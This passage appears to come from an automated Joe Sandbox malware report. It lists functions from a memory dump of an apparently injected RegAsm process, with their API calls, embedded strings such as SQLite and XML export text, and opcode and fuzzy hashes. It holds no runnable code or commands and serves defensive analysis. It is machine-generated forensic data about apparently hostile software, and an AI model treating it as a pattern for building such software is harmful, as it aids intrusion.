                                                                                                                                                                                • Opcode Fuzzy Hash: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                                                                                                                                                                                • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                                                Function 00406D77 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                                                                                • API String ID: 1670431679-1552265934
                                                                                                                                                                                • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                                                                                                                • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                                                                                                                Function 0043DF30 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 479COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0043DFC5
                                                                                                                                                                                • memset.MSVCRT ref: 0043DFFE
                                                                                                                                                                                • memcpy.MSVCRT(00000001,B2850F59,00000000,?,00000001,00000000), ref: 0043E27C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                                                • String ID: $no query solution
                                                                                                                                                                                • API String ID: 368790112-326442043
                                                                                                                                                                                • Opcode ID: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                                                                • Instruction ID: 13ed0bad29dc8f20330308844ce1f2220340576076c9bd20db88b336710dfa55
                                                                                                                                                                                • Opcode Fuzzy Hash: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                                                                • Instruction Fuzzy Hash: 46128A75D01619DFCB24CF9AC481AAEB7F1FF08314F14916EE895AB391D338A981CB58
                                                                                                                                                                                Function 004309ED Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                • API String ID: 3510742995-272990098
                                                                                                                                                                                • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                                                                                                • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                                                                                                Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                • String ID: H
                                                                                                                                                                                • API String ID: 2221118986-2852464175
                                                                                                                                                                                • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                                                • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                                                Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                • API String ID: 3510742995-3170954634
                                                                                                                                                                                • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                                                • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                                                                Function 0041DB51 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                                                                                                • memcmp.MSVCRT ref: 0041DBAE
                                                                                                                                                                                • memcmp.MSVCRT ref: 0041DBDB
                                                                                                                                                                                • memcmp.MSVCRT ref: 0041DC47
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                                                                                • API String ID: 231171946-3708268960
                                                                                                                                                                                • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                                                                                • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                                                                                Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                • String ID: winWrite1$winWrite2
                                                                                                                                                                                • API String ID: 438689982-3457389245
                                                                                                                                                                                • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                                                • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                                                Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                • String ID: winRead
                                                                                                                                                                                • API String ID: 1297977491-2759563040
                                                                                                                                                                                • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                                • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                                Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0044955B
                                                                                                                                                                                • memset.MSVCRT ref: 0044956B
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                • String ID: gj
                                                                                                                                                                                • API String ID: 1297977491-4203073231
                                                                                                                                                                                • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                                • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                                Function 0040AB66 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                • memset.MSVCRT ref: 0040AB9C
                                                                                                                                                                                  • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                • API String ID: 3337535707-2769808009
                                                                                                                                                                                • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                                                                                • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                                                                                Function 0040C143 Relevance: 7.6, APIs: 5, Instructions: 54clipboardCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                                • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1189762176-0
                                                                                                                                                                                • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                                                • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                                                Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4247780290-0
                                                                                                                                                                                • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                                                • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                                                Function 0040B994 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                                                                                  • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                                                                                  • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                                                                                • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                                                                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                  • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                  • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                • SetCursor.USER32 ref: 0040B9F9
                                                                                                                                                                                • SetFocus.USER32(?), ref: 0040BA0B
                                                                                                                                                                                • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2374668499-0
                                                                                                                                                                                • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                                                                • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                                                                                • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                                                                • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                                                                                Function 0040AD38 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040AD5B
                                                                                                                                                                                • memset.MSVCRT ref: 0040AD71
                                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040ADA8
                                                                                                                                                                                Strings
                                                                                                                                                                                • <%s>, xrefs: 0040ADA2
                                                                                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                • API String ID: 3699762281-1998499579
                                                                                                                                                                                • Opcode ID: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                                                                                • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                                                                                                                                                • Opcode Fuzzy Hash: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                                                                                • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                                                                                                                                                Function 00409A32 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                • Opcode ID: 719bf35f5edd6f743f398197aebabc3c3e3d79d9cb1a1b13ae007a7bface88c2
                                                                                                                                                                                • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                                                                                                                • Opcode Fuzzy Hash: 719bf35f5edd6f743f398197aebabc3c3e3d79d9cb1a1b13ae007a7bface88c2
                                                                                                                                                                                • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                                                                                                                Function 00409A98 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                                                                                                • free.MSVCRT ref: 00409B00
                                                                                                                                                                                  • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@$free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2241099983-0
                                                                                                                                                                                • Opcode ID: 15a481c8f84ee3b442f71837438c05ceab47f4c823323df975f811a14ab91f85
                                                                                                                                                                                • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                                                                                                                • Opcode Fuzzy Hash: 15a481c8f84ee3b442f71837438c05ceab47f4c823323df975f811a14ab91f85
                                                                                                                                                                                • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                                                                                                                Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                                  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                                  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                                                • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                                                • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2775283111-0
                                                                                                                                                                                • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                                                                • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                                                Function 00405F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C
                                                                                                                                                                                  • Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
                                                                                                                                                                                  • Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
                                                                                                                                                                                  • Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680
                                                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040602B
                                                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 00406036
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                • String ID: $
